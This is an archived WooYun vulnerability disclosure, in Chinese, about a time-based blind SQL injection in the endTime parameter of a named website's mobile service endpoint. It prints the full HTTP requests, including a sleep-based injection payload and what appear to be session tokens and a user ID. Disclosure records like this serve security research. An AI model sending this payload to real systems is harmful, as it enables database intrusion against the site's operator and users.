乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2016-03-28: 细节已通知厂商并且等待厂商处理中 2016-04-02: 厂商已经主动忽略漏洞,细节向公众公开
目标:www.jjlwd.com检测发现以下地方存在SQL注入:(POST中的endTime,时间盲注)
POST http://www.jjlwd.com/mobile/appService.do HTTP/1.1Content-Length: 218Content-Type: application/x-www-form-urlencodedX-Requested-With: XMLHttpRequestReferer: http://www.jjlwd.com/mobile/appService.doHost: www.jjlwd.comConnection: Keep-aliveAccept-Encoding: gzip,deflateUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21Accept: */*auth=jjlwd&endTime=2015-12-30%2023%3A59%3A59&functionType=41&info=2015&page_count=10000&page_index=0&sign=E2BFDCBE3EC3B2E291576EF46BFD9D29&startTime=2015-12-01%2000%3A00%3A00&token=D5C0B188F68A8751a3547802&userID=41911
Payload:(延时2秒)
POST http://www.jjlwd.com/mobile/appService.do HTTP/1.1Content-Length: 237Content-Type: application/x-www-form-urlencodedX-Requested-With: XMLHttpRequestReferer: http://www.jjlwd.com/mobile/appService.doHost: www.jjlwd.comConnection: Keep-aliveAccept-Encoding: gzip,deflateUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21Accept: */*auth=jjlwd&endTime='XOR(if(now()%3Dsysdate()%2Csleep(1)%2C0))AND'&functionType=41&info=2015&page_count=10000&page_index=0&sign=E2BFDCBE3EC3B2E291576EF46BFD9D29&startTime=2015-12-01+00%3A00%3A00&token=D5C0B188F68A8751a3547802&userID=41911
1、当前数据库用户
2、当前数据库
请多指教~
危害等级:无影响厂商忽略
忽略时间:2016-04-02 09:20
漏洞Rank:15 (WooYun评价)
暂无